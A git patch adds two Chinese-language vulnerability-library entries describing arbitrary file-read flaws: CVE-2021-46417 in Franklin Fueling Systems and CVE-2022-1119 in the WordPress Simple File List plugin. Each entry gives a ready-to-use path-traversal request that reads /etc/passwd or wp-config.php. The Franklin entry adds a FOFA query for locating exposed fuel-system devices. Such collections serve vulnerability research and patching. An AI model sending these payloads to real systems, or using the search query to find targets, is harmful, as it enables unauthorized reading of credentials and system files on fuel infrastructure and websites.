From 0767cdb8040d228d807756dd9ba99295f215f68a Mon Sep 17 00:00:00 2001 From: Threekiii <472361400@qq.com> Date: Fri, 15 Jul 2022 11:17:09 +0800 Subject: [PATCH] =?UTF-8?q?=E6=9B=B4=E6=96=B0=E6=BC=8F=E6=B4=9E=E5=BA=93?= =?UTF-8?q?=EF=BC=9A=E6=9C=8D=E5=8A=A1=E5=99=A8=E5=BA=94=E7=94=A8=E6=BC=8F?= =?UTF-8?q?=E6=B4=9E/?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... tsaupload.cgi 任意文件读取漏洞 CVE-2021-46417.md | 34 +++++++++++ ...-downloader.php 任意文件读取漏洞 CVE-2022-1119.md | 57 +++++++++++++++++++ 2 files changed, 91 insertions(+) create mode 100644 服务器应用漏洞/Franklin Fueling Systems tsaupload.cgi 任意文件读取漏洞 CVE-2021-46417.md create mode 100644 服务器应用漏洞/WordPress Simple File List ee-downloader.php 任意文件读取漏洞 CVE-2022-1119.md diff --git a/服务器应用漏洞/Franklin Fueling Systems tsaupload.cgi 任意文件读取漏洞 CVE-2021-46417.md b/服务器应用漏洞/Franklin Fueling Systems tsaupload.cgi 任意文件读取漏洞 CVE-2021-46417.md new file mode 100644 index 0000000..8162295 --- /dev/null +++ b/服务器应用漏洞/Franklin Fueling Systems tsaupload.cgi 任意文件读取漏洞 CVE-2021-46417.md @@ -0,0 +1,34 @@ +# Franklin Fueling Systems tsaupload.cgi 任意文件读取漏洞 CVE-2021-46417 + +## 漏洞描述 + +Franklin Electric Franklin Fueling Systems是美国Franklin Electric公司的一个加油系统。 + +Franklin Fueling Systems tsaupload.cgi 存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器敏感文件。 + +## 漏洞影响 + +``` +Franklin Fueling Systems +``` + +## FOFA + +``` +"Franklin Fueling Systems" +``` + +## 漏洞复现 + +主页面 + +![image-20220715105504364](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202207151055481.png) + +验证POC + +``` +/cgi-bin/tsaupload.cgi?file_name=../../../../../../etc/passwd&password= +``` + +![image-20220715105538276](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202207151055335.png) + diff --git a/服务器应用漏洞/WordPress Simple File List ee-downloader.php 任意文件读取漏洞 CVE-2022-1119.md b/服务器应用漏洞/WordPress Simple File List ee-downloader.php 任意文件读取漏洞 CVE-2022-1119.md new file mode 100644 index 0000000..5bbdb7f --- /dev/null +++ b/服务器应用漏洞/WordPress Simple File List ee-downloader.php 任意文件读取漏洞 CVE-2022-1119.md @@ -0,0 +1,57 @@ +# WordPress Simple File List ee-downloader.php 任意文件读取漏洞 CVE-2022-1119 + +## 漏洞描述 + +WordPress Simple File List插件 ee-downloader.php文件存在任意文件读取漏洞,攻击者通过漏洞可以读取服务器中的任意文件 + +## 漏洞影响 + +``` +WordPress Simple File List < 3.2.8 +``` + +## 插件名 + +Simple File List + +https://downloads.wordpress.org/plugin/simple-file-list.3.2.17.zip + +## 漏洞复现 + +存在漏洞的文件为 `wp-content/plugins/simple-file-list/includes/ee-downloader.php` + +![image-20220706134725779](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202207061347857.png) + +```php + +``` + +直接传参获取文件信息, 验证POC + +``` +/wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php +``` + +![image-20220706134750574](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202207061347645.png) \ No newline at end of file